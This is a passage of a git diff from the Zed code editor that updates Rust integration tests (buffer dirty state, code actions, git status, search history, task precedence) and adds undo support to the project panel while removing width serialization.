.entry_for_path(rel_path("repro/repro-marker")) + .is_some() + ); + }); +} + #[gpui::test(iterations = 10)] async fn test_buffer_identity_across_renames(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -5506,7 +5890,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { assert_eq!( *events.lock(), &[ - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, language::BufferEvent::DirtyChanged ] ); @@ -5535,9 +5919,9 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { assert_eq!( *events.lock(), &[ - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, language::BufferEvent::DirtyChanged, - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, ], ); events.lock().clear(); @@ -5552,7 +5936,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { assert_eq!( *events.lock(), &[ - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, language::BufferEvent::DirtyChanged ] ); @@ -5592,7 +5976,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { assert_eq!( mem::take(&mut *events.lock()), &[ - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, language::BufferEvent::DirtyChanged ] ); @@ -5607,7 +5991,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { assert_eq!( *events.lock(), &[ - language::BufferEvent::Edited, + language::BufferEvent::Edited { is_local: true }, language::BufferEvent::DirtyChanged ] ); @@ -5641,6 +6025,75 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) { cx.update(|cx| assert!(buffer3.read(cx).is_dirty())); } +#[gpui::test] +async fn test_dirty_buffer_reloads_after_undo(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({ + "file.txt": "version 1", + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], 
cx).await; + let buffer = project + .update(cx, |p, cx| p.open_local_buffer(path!("/dir/file.txt"), cx)) + .await + .unwrap(); + + buffer.read_with(cx, |buffer, _| { + assert_eq!(buffer.text(), "version 1"); + assert!(!buffer.is_dirty()); + }); + + // User makes an edit, making the buffer dirty. + buffer.update(cx, |buffer, cx| { + buffer.edit([(0..0, "user edit: ")], None, cx); + }); + + buffer.read_with(cx, |buffer, _| { + assert!(buffer.is_dirty()); + assert_eq!(buffer.text(), "user edit: version 1"); + }); + + // External tool writes new content while buffer is dirty. + // file_updated() updates the File but suppresses ReloadNeeded. + fs.save( + path!("/dir/file.txt").as_ref(), + &"version 2 from external tool".into(), + Default::default(), + ) + .await + .unwrap(); + cx.executor().run_until_parked(); + + buffer.read_with(cx, |buffer, _| { + assert!(buffer.has_conflict()); + assert_eq!(buffer.text(), "user edit: version 1"); + }); + + // User undoes their edit. Buffer becomes clean, but disk has different + // content. did_edit() detects the dirty->clean transition and checks if + // disk changed while dirty. Since mtime differs from saved_mtime, it + // emits ReloadNeeded. 
+ buffer.update(cx, |buffer, cx| { + buffer.undo(cx); + }); + cx.executor().run_until_parked(); + + buffer.read_with(cx, |buffer, _| { + assert_eq!( + buffer.text(), + "version 2 from external tool", + "buffer should reload from disk after undo makes it clean" + ); + assert!(!buffer.is_dirty()); + }); +} + #[gpui::test] async fn test_buffer_file_changes_on_disk(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -7549,6 +8002,92 @@ async fn test_code_actions_only_kinds(cx: &mut gpui::TestAppContext) { ); } +#[gpui::test] +async fn test_code_actions_without_requested_kinds_do_not_send_only_filter( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({ + "a.ts": "a", + }), + ) + .await; + + let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; + + let language_registry = project.read_with(cx, |project, _| project.languages().clone()); + language_registry.add(typescript_lang()); + let mut fake_language_servers = language_registry.register_fake_lsp( + "TypeScript", + FakeLspAdapter { + capabilities: lsp::ServerCapabilities { + code_action_provider: Some(lsp::CodeActionProviderCapability::Options( + lsp::CodeActionOptions { + code_action_kinds: Some(vec![ + CodeActionKind::SOURCE_ORGANIZE_IMPORTS, + "source.doc".into(), + ]), + ..lsp::CodeActionOptions::default() + }, + )), + ..lsp::ServerCapabilities::default() + }, + ..FakeLspAdapter::default() + }, + ); + + let (buffer, _handle) = project + .update(cx, |p, cx| { + p.open_local_buffer_with_lsp(path!("/dir/a.ts"), cx) + }) + .await + .unwrap(); + cx.executor().run_until_parked(); + + let fake_server = fake_language_servers + .next() + .await + .expect("failed to get the language server"); + + let mut request_handled = fake_server.set_request_handler::< + lsp::request::CodeActionRequest, + _, + _, + >(move |params, _| async move { + assert_eq!( + params.context.only, None, + "Code action requests without explicit kind 
filters should not send `context.only`" + ); + Ok(Some(vec![lsp::CodeActionOrCommand::CodeAction( + lsp::CodeAction { + title: "Add test".to_string(), + kind: Some("source.addTest".into()), + ..lsp::CodeAction::default() + }, + )])) + }); + + let code_actions_task = project.update(cx, |project, cx| { + project.code_actions(&buffer, 0..buffer.read(cx).len(), None, cx) + }); + + let () = request_handled + .next() + .await + .expect("The code action request should have been triggered"); + + let code_actions = code_actions_task.await.unwrap().unwrap(); + assert_eq!(code_actions.len(), 1); + assert_eq!( + code_actions[0].lsp_action.action_kind(), + Some("source.addTest".into()) + ); +} + #[gpui::test] async fn test_multiple_language_server_actions(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -7986,9 +8525,10 @@ async fn test_unstaged_diff_for_buffer(cx: &mut gpui::TestAppContext) { unstaged_diff.update(cx, |unstaged_diff, cx| { let snapshot = buffer.read(cx).snapshot(); assert_hunks( - unstaged_diff - .snapshot(cx) - .hunks_intersecting_range(Anchor::MIN..Anchor::MAX, &snapshot), + unstaged_diff.snapshot(cx).hunks_intersecting_range( + Anchor::min_max_range_for_buffer(snapshot.remote_id()), + &snapshot, + ), &snapshot, &unstaged_diff.base_text(cx).text(), &[( @@ -8077,8 +8617,10 @@ async fn test_uncommitted_diff_for_buffer(cx: &mut gpui::TestAppContext) { diff_1.update(cx, |diff, cx| { let snapshot = buffer_1.read(cx).snapshot(); assert_hunks( - diff.snapshot(cx) - .hunks_intersecting_range(Anchor::MIN..Anchor::MAX, &snapshot), + diff.snapshot(cx).hunks_intersecting_range( + Anchor::min_max_range_for_buffer(snapshot.remote_id()), + &snapshot, + ), &snapshot, &diff.base_text_string(cx).unwrap(), &[ @@ -8119,8 +8661,10 @@ async fn test_uncommitted_diff_for_buffer(cx: &mut gpui::TestAppContext) { diff_1.update(cx, |diff, cx| { let snapshot = buffer_1.read(cx).snapshot(); assert_hunks( - diff.snapshot(cx) - .hunks_intersecting_range(Anchor::MIN..Anchor::MAX, 
&snapshot), + diff.snapshot(cx).hunks_intersecting_range( + Anchor::min_max_range_for_buffer(snapshot.remote_id()), + &snapshot, + ), &snapshot, &diff.base_text(cx).text(), &[( @@ -8149,8 +8693,10 @@ async fn test_uncommitted_diff_for_buffer(cx: &mut gpui::TestAppContext) { diff_2.update(cx, |diff, cx| { let snapshot = buffer_2.read(cx).snapshot(); assert_hunks( - diff.snapshot(cx) - .hunks_intersecting_range(Anchor::MIN..Anchor::MAX, &snapshot), + diff.snapshot(cx).hunks_intersecting_range( + Anchor::min_max_range_for_buffer(snapshot.remote_id()), + &snapshot, + ), &snapshot, &diff.base_text_string(cx).unwrap(), &[( @@ -8171,8 +8717,10 @@ async fn test_uncommitted_diff_for_buffer(cx: &mut gpui::TestAppContext) { diff_2.update(cx, |diff, cx| { let snapshot = buffer_2.read(cx).snapshot(); assert_hunks( - diff.snapshot(cx) - .hunks_intersecting_range(Anchor::MIN..Anchor::MAX, &snapshot), + diff.snapshot(cx).hunks_intersecting_range( + Anchor::min_max_range_for_buffer(snapshot.remote_id()), + &snapshot, + ), &snapshot, &diff.base_text_string(cx).unwrap(), &[( @@ -9207,14 +9755,23 @@ async fn test_git_repository_status(cx: &mut gpui::TestAppContext) { StatusEntry { repo_path: repo_path("a.txt"), status: StatusCode::Modified.worktree(), + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), }, StatusEntry { repo_path: repo_path("b.txt"), status: FileStatus::Untracked, + diff_stat: None, }, StatusEntry { repo_path: repo_path("d.txt"), status: StatusCode::Deleted.worktree(), + diff_stat: Some(DiffStat { + added: 0, + deleted: 1, + }), }, ] ); @@ -9236,18 +9793,31 @@ async fn test_git_repository_status(cx: &mut gpui::TestAppContext) { StatusEntry { repo_path: repo_path("a.txt"), status: StatusCode::Modified.worktree(), + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), }, StatusEntry { repo_path: repo_path("b.txt"), status: FileStatus::Untracked, + diff_stat: None, }, StatusEntry { repo_path: repo_path("c.txt"), status: StatusCode::Modified.worktree(), + 
diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), }, StatusEntry { repo_path: repo_path("d.txt"), status: StatusCode::Deleted.worktree(), + diff_stat: Some(DiffStat { + added: 0, + deleted: 1, + }), }, ] ); @@ -9281,6 +9851,10 @@ async fn test_git_repository_status(cx: &mut gpui::TestAppContext) { [StatusEntry { repo_path: repo_path("a.txt"), status: StatusCode::Deleted.worktree(), + diff_stat: Some(DiffStat { + added: 0, + deleted: 1, + }), }] ); }); @@ -9345,6 +9919,7 @@ async fn test_git_status_postprocessing(cx: &mut gpui::TestAppContext) { worktree_status: StatusCode::Added } .into(), + diff_stat: None, }] ) }); @@ -9547,6 +10122,10 @@ async fn test_repository_pending_ops_staging( worktree_status: StatusCode::Unmodified } .into(), + diff_stat: Some(DiffStat { + added: 1, + deleted: 0, + }), }] ); }); @@ -9653,6 +10232,10 @@ async fn test_repository_pending_ops_long_running_staging( worktree_status: StatusCode::Unmodified } .into(), + diff_stat: Some(DiffStat { + added: 1, + deleted: 0, + }), }] ); }); @@ -9777,10 +10360,12 @@ async fn test_repository_pending_ops_stage_all( StatusEntry { repo_path: repo_path("a.txt"), status: FileStatus::Untracked, + diff_stat: None, }, StatusEntry { repo_path: repo_path("b.txt"), status: FileStatus::Untracked, + diff_stat: None, }, ] ); @@ -10409,10 +10994,7 @@ async fn test_ignored_dirs_events(cx: &mut gpui::TestAppContext) { assert_eq!( repository_updates.lock().drain(..).collect::>(), - vec![ - RepositoryEvent::StatusesChanged, - RepositoryEvent::MergeHeadsChanged, - ], + vec![RepositoryEvent::StatusesChanged,], "Initial worktree scan should produce a repo update event" ); assert_eq!( @@ -10579,8 +11161,7 @@ async fn test_odd_events_for_ignored_dirs( assert_eq!( repository_updates.lock().drain(..).collect::>(), vec![ - RepositoryEvent::MergeHeadsChanged, - RepositoryEvent::BranchChanged, + RepositoryEvent::HeadChanged, RepositoryEvent::StatusesChanged, RepositoryEvent::StatusesChanged, ], @@ -10924,6 +11505,14 @@ 
async fn test_git_worktrees_and_submodules(cx: &mut gpui::TestAppContext) { repo.read(cx).work_directory_abs_path, Path::new(path!("/project/some-worktree")).into(), ); + pretty_assertions::assert_eq!( + repo.read(cx).original_repo_abs_path, + Path::new(path!("/project")).into(), + ); + assert!( + repo.read(cx).linked_worktree_path().is_some(), + "linked worktree should be detected as a linked worktree" + ); let barrier = repo.update(cx, |repo, _| repo.barrier()); (repo.clone(), barrier) }); @@ -10969,6 +11558,14 @@ async fn test_git_worktrees_and_submodules(cx: &mut gpui::TestAppContext) { repo.read(cx).work_directory_abs_path, Path::new(path!("/project/subdir/some-submodule")).into(), ); + pretty_assertions::assert_eq!( + repo.read(cx).original_repo_abs_path, + Path::new(path!("/project/subdir/some-submodule")).into(), + ); + assert!( + repo.read(cx).linked_worktree_path().is_none(), + "submodule should not be detected as a linked worktree" + ); let barrier = repo.update(cx, |repo, _| repo.barrier()); (repo.clone(), barrier) }); @@ -11241,6 +11838,77 @@ async fn test_undo_encoding_change(cx: &mut gpui::TestAppContext) { }); } +#[gpui::test] +async fn test_initial_scan_complete(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/root"), + json!({ + "a": { + ".git": {}, + ".zed": { + "tasks.json": r#"[{"label": "task-a", "command": "echo a"}]"# + }, + "src": { "main.rs": "" } + }, + "b": { + ".git": {}, + ".zed": { + "tasks.json": r#"[{"label": "task-b", "command": "echo b"}]"# + }, + "src": { "lib.rs": "" } + }, + }), + ) + .await; + + let repos_created = Rc::new(RefCell::new(Vec::new())); + let _observe = { + let repos_created = repos_created.clone(); + cx.update(|cx| { + cx.observe_new::(move |repo, _, cx| { + repos_created.borrow_mut().push(cx.entity().downgrade()); + let _ = repo; + }) + }) + }; + + let project = Project::test( + fs.clone(), + [path!("/root/a").as_ref(), 
path!("/root/b").as_ref()], + cx, + ) + .await; + + let scan_complete = project.read_with(cx, |project, cx| project.wait_for_initial_scan(cx)); + scan_complete.await; + + project.read_with(cx, |project, cx| { + assert!( + project.worktree_store().read(cx).initial_scan_completed(), + "Expected initial scan to be completed after awaiting wait_for_initial_scan" + ); + }); + + let created_repos_len = repos_created.borrow().len(); + assert_eq!( + created_repos_len, 2, + "Expected 2 repositories to be created during scan, got {}", + created_repos_len + ); + + project.read_with(cx, |project, cx| { + let git_store = project.git_store().read(cx); + assert_eq!( + git_store.repositories().len(), + 2, + "Expected 2 repositories in GitStore" + ); + }); +} + pub fn init_test(cx: &mut gpui::TestAppContext) { zlog::init_test(); @@ -11288,7 +11956,6 @@ fn python_lang(fs: Arc) -> Arc { worktree_root: PathBuf, subroot_relative_path: Arc, _: Option>, - _: &dyn Fs, ) -> ToolchainList { // This lister will always return a path .venv directories within ancestors let ancestors = subroot_relative_path.ancestors().collect::>(); @@ -11313,7 +11980,6 @@ fn python_lang(fs: Arc) -> Arc { &self, _: PathBuf, _: Option>, - _: &dyn Fs, ) -> anyhow::Result { Err(anyhow::anyhow!("Not implemented")) } diff --git a/crates/project/tests/integration/search.rs b/crates/project/tests/integration/search.rs index b28240289c8a5b28e4db2827e4c08b745082f4f3..79266405084d293329056b55a57c72a043aa8ff0 100644 --- a/crates/project/tests/integration/search.rs +++ b/crates/project/tests/integration/search.rs @@ -148,7 +148,7 @@ async fn test_multiline_regex(cx: &mut gpui::TestAppContext) { use language::Buffer; let text = Rope::from("hello\nworld\nhello\nworld"); let snapshot = cx - .update(|app| Buffer::build_snapshot(text, None, None, app)) + .update(|app| Buffer::build_snapshot(text, None, None, None, app)) .await; let results = search_query.search(&snapshot, None).await; diff --git 
a/crates/project/tests/integration/search_history.rs b/crates/project/tests/integration/search_history.rs index 4b2d2b90ef0b91d2ff768dcd1a44d2ccfdc529d4..c6dfbe717c9e794474cc6641e5af0a03e1d38860 100644 --- a/crates/project/tests/integration/search_history.rs +++ b/crates/project/tests/integration/search_history.rs @@ -38,7 +38,7 @@ fn test_add() { // add item when it equals to current item if it's not the last one search_history.add(&mut cursor, "php".to_string()); - search_history.previous(&mut cursor); + search_history.previous(&mut cursor, ""); assert_eq!(search_history.current(&cursor), Some("rustlang")); search_history.add(&mut cursor, "rustlang".to_string()); assert_eq!(search_history.len(), 3, "Should add item"); @@ -71,13 +71,13 @@ fn test_next_and_previous() { assert_eq!(search_history.current(&cursor), Some("TypeScript")); - assert_eq!(search_history.previous(&mut cursor), Some("JavaScript")); + assert_eq!(search_history.previous(&mut cursor, ""), Some("JavaScript")); assert_eq!(search_history.current(&cursor), Some("JavaScript")); - assert_eq!(search_history.previous(&mut cursor), Some("Rust")); + assert_eq!(search_history.previous(&mut cursor, ""), Some("Rust")); assert_eq!(search_history.current(&cursor), Some("Rust")); - assert_eq!(search_history.previous(&mut cursor), None); + assert_eq!(search_history.previous(&mut cursor, ""), None); assert_eq!(search_history.current(&cursor), Some("Rust")); assert_eq!(search_history.next(&mut cursor), Some("JavaScript")); @@ -103,14 +103,14 @@ fn test_reset_selection() { cursor.reset(); assert_eq!(search_history.current(&cursor), None); assert_eq!( - search_history.previous(&mut cursor), + search_history.previous(&mut cursor, ""), Some("TypeScript"), "Should start from the end after reset on previous item query" ); - search_history.previous(&mut cursor); + search_history.previous(&mut cursor, ""); assert_eq!(search_history.current(&cursor), Some("JavaScript")); - search_history.previous(&mut cursor); + 
search_history.previous(&mut cursor, ""); assert_eq!(search_history.current(&cursor), Some("Rust")); cursor.reset(); @@ -134,8 +134,11 @@ fn test_multiple_cursors() { assert_eq!(search_history.current(&cursor1), Some("TypeScript")); assert_eq!(search_history.current(&cursor2), Some("C++")); - assert_eq!(search_history.previous(&mut cursor1), Some("JavaScript")); - assert_eq!(search_history.previous(&mut cursor2), Some("Java")); + assert_eq!( + search_history.previous(&mut cursor1, ""), + Some("JavaScript") + ); + assert_eq!(search_history.previous(&mut cursor2, ""), Some("Java")); assert_eq!(search_history.next(&mut cursor1), Some("TypeScript")); assert_eq!(search_history.next(&mut cursor1), Some("Python")); diff --git a/crates/project/tests/integration/task_inventory.rs b/crates/project/tests/integration/task_inventory.rs index fe42a0dea28645fcbf636f9e62608b549249fb93..6c51fa93571c4ca5d5f55631c67b29c1bc1c9963 100644 --- a/crates/project/tests/integration/task_inventory.rs +++ b/crates/project/tests/integration/task_inventory.rs @@ -560,6 +560,54 @@ async fn test_inventory_static_task_filters(cx: &mut TestAppContext) { ); } +#[gpui::test] +async fn test_zed_tasks_take_precedence_over_vscode(cx: &mut TestAppContext) { + init_test(cx); + let inventory = cx.update(|cx| Inventory::new(cx)); + let worktree_id = WorktreeId::from_usize(0); + + inventory.update(cx, |inventory, _| { + inventory + .update_file_based_tasks( + TaskSettingsLocation::Worktree(SettingsLocation { + worktree_id, + path: rel_path(".vscode"), + }), + Some(&mock_tasks_from_names(["vscode_task"])), + ) + .unwrap(); + }); + assert_eq!( + task_template_names(&inventory, Some(worktree_id), cx).await, + vec!["vscode_task"], + "With only .vscode tasks, they should appear" + ); + + inventory.update(cx, |inventory, _| { + inventory + .update_file_based_tasks( + TaskSettingsLocation::Worktree(SettingsLocation { + worktree_id, + path: rel_path(".zed"), + }), + Some(&mock_tasks_from_names(["zed_task"])), + ) + 
.unwrap(); + }); + assert_eq!( + task_template_names(&inventory, Some(worktree_id), cx).await, + vec!["zed_task"], + "With both .zed and .vscode tasks, only .zed tasks should appear" + ); + + register_worktree_task_used(&inventory, worktree_id, "zed_task", cx).await; + let resolved = resolved_task_names(&inventory, Some(worktree_id), cx).await; + assert!( + !resolved.iter().any(|name| name == "vscode_task"), + "Previously used .vscode tasks should not appear when .zed tasks exist, got: {resolved:?}" + ); +} + fn init_test(_cx: &mut TestAppContext) { zlog::init_test(); TaskStore::init(None); diff --git a/crates/project_panel/Cargo.toml b/crates/project_panel/Cargo.toml index 5149c6f7834474439bd6119511bb294b560fe4de..2192b8daf3a301d580a3cef73426f6348508a566 100644 --- a/crates/project_panel/Cargo.toml +++ b/crates/project_panel/Cargo.toml @@ -20,7 +20,6 @@ doctest = false anyhow.workspace = true collections.workspace = true command_palette_hooks.workspace = true -db.workspace = true editor.workspace = true file_icons.workspace = true git_ui.workspace = true @@ -37,6 +36,7 @@ serde_json.workspace = true settings.workspace = true smallvec.workspace = true theme.workspace = true +theme_settings.workspace = true rayon.workspace = true ui.workspace = true util.workspace = true @@ -47,6 +47,7 @@ language.workspace = true zed_actions.workspace = true telemetry.workspace = true notifications.workspace = true +feature_flags.workspace = true [dev-dependencies] client = { workspace = true, features = ["test-support"] } diff --git a/crates/project_panel/src/project_panel.rs b/crates/project_panel/src/project_panel.rs index f6908b2c7fa3efa09b94377eb6f58165c1512088..d1a5b8a0ece5e3ddc6b1fe924154583b401a0fc9 100644 --- a/crates/project_panel/src/project_panel.rs +++ b/crates/project_panel/src/project_panel.rs @@ -1,11 +1,11 @@ pub mod project_panel_settings; +mod undo; mod utils; use anyhow::{Context as _, Result}; use client::{ErrorCode, ErrorExt}; use collections::{BTreeSet, 
HashMap, hash_map}; use command_palette_hooks::CommandPaletteFilter; -use db::kvp::KEY_VALUE_STORE; use editor::{ Editor, EditorEvent, MultiBufferOffset, items::{ @@ -13,20 +13,21 @@ use editor::{ entry_diagnostic_aware_icon_name_and_color, entry_git_aware_label_color, }, }; +use feature_flags::{FeatureFlagAppExt, ProjectPanelUndoRedoFeatureFlag}; use file_icons::FileIcons; use git; use git::status::GitSummary; use git_ui; use git_ui::file_diff_view::FileDiffView; use gpui::{ - Action, AnyElement, App, AsyncWindowContext, Bounds, ClipboardItem, Context, CursorStyle, - DismissEvent, Div, DragMoveEvent, Entity, EventEmitter, ExternalPaths, FocusHandle, Focusable, - FontWeight, Hsla, InteractiveElement, KeyContext, ListHorizontalSizingBehavior, - ListSizingBehavior, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent, - ParentElement, PathPromptOptions, Pixels, Point, PromptLevel, Render, ScrollStrategy, Stateful, - Styled, Subscription, Task, UniformListScrollHandle, WeakEntity, Window, actions, anchored, - deferred, div, hsla, linear_color_stop, linear_gradient, point, px, size, transparent_white, - uniform_list, + Action, AnyElement, App, AsyncWindowContext, Bounds, ClipboardEntry as GpuiClipboardEntry, + ClipboardItem, Context, CursorStyle, DismissEvent, Div, DragMoveEvent, Entity, EventEmitter, + ExternalPaths, FocusHandle, Focusable, FontWeight, Hsla, InteractiveElement, KeyContext, + ListHorizontalSizingBehavior, ListSizingBehavior, Modifiers, ModifiersChangedEvent, + MouseButton, MouseDownEvent, ParentElement, PathPromptOptions, Pixels, Point, PromptLevel, + Render, ScrollStrategy, Stateful, Styled, Subscription, Task, UniformListScrollHandle, + WeakEntity, Window, actions, anchored, deferred, div, hsla, linear_color_stop, linear_gradient, + point, px, size, transparent_white, uniform_list, }; use language::DiagnosticSeverity; use menu::{Confirm, SelectFirst, SelectLast, SelectNext, SelectPrevious}; @@ -40,12 +41,13 @@ use project::{ use 
project_panel_settings::ProjectPanelSettings; use rayon::slice::ParallelSliceMut; use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; +use serde::Deserialize; use settings::{ DockSide, ProjectPanelEntrySpacing, Settings, SettingsStore, ShowDiagnostics, ShowIndentGuides, update_settings_file, }; use smallvec::SmallVec; +use std::ops::Neg; use std::{any::TypeId, time::Instant}; use std::{ cell::OnceCell, @@ -56,12 +58,12 @@ use std::{ sync::Arc, time::Duration, }; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{ Color, ContextMenu, ContextMenuEntry, DecoratedIcon, Divider, Icon, IconDecoration, - IconDecorationKind, IndentGuideColors, IndentGuideLayout, KeyBinding, Label, LabelSize, - ListItem, ListItemSpacing, ScrollAxes, ScrollableHandle, Scrollbars, StickyCandidate, Tooltip, - WithScrollbar, prelude::*, v_flex, + IconDecorationKind, IndentGuideColors, IndentGuideLayout, Indicator, KeyBinding, Label, + LabelSize, ListItem, ListItemSpacing, ScrollAxes, ScrollableHandle, Scrollbars, + StickyCandidate, Tooltip, WithScrollbar, prelude::*, v_flex, }; use util::{ ResultExt, TakeUntilExt, TryFutureExt, maybe, @@ -69,8 +71,8 @@ use util::{ rel_path::{RelPath, RelPathBuf}, }; use workspace::{ - DraggedSelection, OpenInTerminal, OpenOptions, OpenVisible, PreviewTabsSettings, SelectedEntry, - SplitDirection, Workspace, + DraggedSelection, OpenInTerminal, OpenMode, OpenOptions, OpenVisible, PreviewTabsSettings, + SelectedEntry, SplitDirection, Workspace, dock::{DockPosition, Panel, PanelEvent}, notifications::{DetachAndPromptErr, NotifyResultExt, NotifyTaskExt}, }; @@ -80,6 +82,11 @@ use zed_actions::{ workspace::OpenWithSystem, }; +use crate::{ + project_panel_settings::ProjectPanelScrollbarProxy, + undo::{ProjectPanelOperation, UndoManager}, +}; + const PROJECT_PANEL_KEY: &str = "ProjectPanel"; const NEW_ENTRY_ID: ProjectEntryId = ProjectEntryId::MAX; @@ -143,8 +150,6 @@ pub struct ProjectPanel { clipboard: Option, 
_dragged_entry_destination: Option>, workspace: WeakEntity, - width: Option, - pending_serialization: Task>, diagnostics: HashMap<(WorktreeId, Arc), DiagnosticSeverity>, diagnostic_counts: HashMap<(WorktreeId, Arc), DiagnosticCount>, diagnostic_summary_update: Task<()>, @@ -156,6 +161,7 @@ pub struct ProjectPanel { sticky_items_count: usize, last_reported_update: Instant, update_visible_entries_task: UpdateVisibleEntriesTask, + undo_manager: UndoManager, state: State, } @@ -393,6 +399,8 @@ actions!( SelectPrevDirectory, /// Opens a diff view to compare two marked files. CompareMarkedFiles, + /// Undoes the last file operation. + Undo, ] ); @@ -602,11 +610,6 @@ pub enum Event { Focus, } -#[derive(Serialize, Deserialize)] -struct SerializedProjectPanel { - width: Option, -} - struct DraggedProjectEntryView { selection: SelectedEntry, icon: Option, @@ -872,8 +875,6 @@ impl ProjectPanel { clipboard: None, _dragged_entry_destination: None, workspace: workspace.weak_handle(), - width: None, - pending_serialization: Task::ready(None), diagnostics: Default::default(), diagnostic_counts: Default::default(), diagnostic_summary_update: Task::ready(()), @@ -894,6 +895,7 @@ impl ProjectPanel { unfolded_dir_ids: Default::default(), }, update_visible_entries_task: Default::default(), + undo_manager: UndoManager::new(workspace.weak_handle()), }; this.update_visible_entries(None, false, false, window, cx); @@ -993,35 +995,8 @@ impl ProjectPanel { workspace: WeakEntity, mut cx: AsyncWindowContext, ) -> Result> { - let serialized_panel = match workspace - .read_with(&cx, |workspace, _| { - ProjectPanel::serialization_key(workspace) - }) - .ok() - .flatten() - { - Some(serialization_key) => cx - .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) }) - .await - .context("loading project panel") - .log_err() - .flatten() - .map(|panel| serde_json::from_str::(&panel)) - .transpose() - .log_err() - .flatten(), - None => None, - }; - workspace.update_in(&mut cx, 
|workspace, window, cx| { - let panel = ProjectPanel::new(workspace, window, cx); - if let Some(serialized_panel) = serialized_panel { - panel.update(cx, |panel, cx| { - panel.width = serialized_panel.width.map(|px| px.round()); - cx.notify(); - }); - } - panel + ProjectPanel::new(workspace, window, cx) }) } @@ -1095,40 +1070,6 @@ impl ProjectPanel { .or_insert(diagnostic_severity); } - fn serialization_key(workspace: &Workspace) -> Option { - workspace - .database_id() - .map(|id| i64::from(id).to_string()) - .or(workspace.session_id()) - .map(|id| format!("{}-{:?}", PROJECT_PANEL_KEY, id)) - } - - fn serialize(&mut self, cx: &mut Context) { - let Some(serialization_key) = self - .workspace - .read_with(cx, |workspace, _| { - ProjectPanel::serialization_key(workspace) - }) - .ok() - .flatten() - else { - return; - }; - let width = self.width; - self.pending_serialization = cx.background_spawn( - async move { - KEY_VALUE_STORE - .write_kvp( - serialization_key, - serde_json::to_string(&SerializedProjectPanel { width })?, - ) - .await?; - anyhow::Ok(()) - } - .log_err(), - ); - } - fn focus_in(&mut self, window: &mut Window, cx: &mut Context) { if !self.focus_handle.contains_focused(window, cx) { cx.emit(Event::Focus); @@ -1186,8 +1127,9 @@ impl ProjectPanel { .is_some() }; + let has_pasteable_content = self.has_pasteable_content(cx); let entity = cx.entity(); - let context_menu = ContextMenu::build(window, cx, |menu, _, _| { + let context_menu = ContextMenu::build(window, cx, |menu, _, cx| { menu.context(self.focus_handle.clone()).map(|menu| { if is_read_only { menu.when(is_dir, |menu| { @@ -1199,13 +1141,7 @@ impl ProjectPanel { .separator() .when(is_local, |menu| { menu.action( - if cfg!(target_os = "macos") && !is_remote { - "Reveal in Finder" - } else if cfg!(target_os = "windows") && !is_remote { - "Reveal in File Explorer" - } else { - "Reveal in File Manager" - }, + ui::utils::reveal_in_file_manager_label(is_remote), Box::new(RevealInFileManager), ) }) @@ 
-1232,11 +1168,14 @@ impl ProjectPanel { .action("Copy", Box::new(Copy)) .action("Duplicate", Box::new(Duplicate)) // TODO: Paste should always be visible, cbut disabled when clipboard is empty - .action_disabled_when( - self.clipboard.as_ref().is_none(), - "Paste", - Box::new(Paste), - ) + .action_disabled_when(!has_pasteable_content, "Paste", Box::new(Paste)) + .when(cx.has_flag::(), |menu| { + menu.action_disabled_when( + !self.undo_manager.can_undo(), + "Undo", + Box::new(Undo), + ) + }) .when(is_remote, |menu| { menu.separator() .action("Download...", Box::new(DownloadFromRemote)) @@ -1882,6 +1821,8 @@ impl ProjectPanel { let edit_task; let edited_entry_id; + let edited_entry; + let new_project_path: ProjectPath; if is_new_entry { self.selection = Some(SelectedEntry { worktree_id, @@ -1892,12 +1833,14 @@ impl ProjectPanel { return None; } + edited_entry = None; edited_entry_id = NEW_ENTRY_ID; + new_project_path = (worktree_id, new_path).into(); edit_task = self.project.update(cx, |project, cx| { - project.create_entry((worktree_id, new_path), is_dir, cx) + project.create_entry(new_project_path.clone(), is_dir, cx) }); } else { - let new_path = if let Some(parent) = entry.path.clone().parent() { + let new_path = if let Some(parent) = entry.path.parent() { parent.join(&filename) } else { filename.clone() @@ -1909,9 +1852,11 @@ impl ProjectPanel { return None; } edited_entry_id = entry.id; + edited_entry = Some(entry); + new_project_path = (worktree_id, new_path).into(); edit_task = self.project.update(cx, |project, cx| { - project.rename_entry(entry.id, (worktree_id, new_path).into(), cx) - }); + project.rename_entry(edited_entry_id, new_project_path.clone(), cx) + }) }; if refocus { @@ -1924,6 +1869,22 @@ impl ProjectPanel { let new_entry = edit_task.await; project_panel.update(cx, |project_panel, cx| { project_panel.state.edit_state = None; + + // Record the operation if the edit was applied + if new_entry.is_ok() { + let operation = if let Some(old_entry) = 
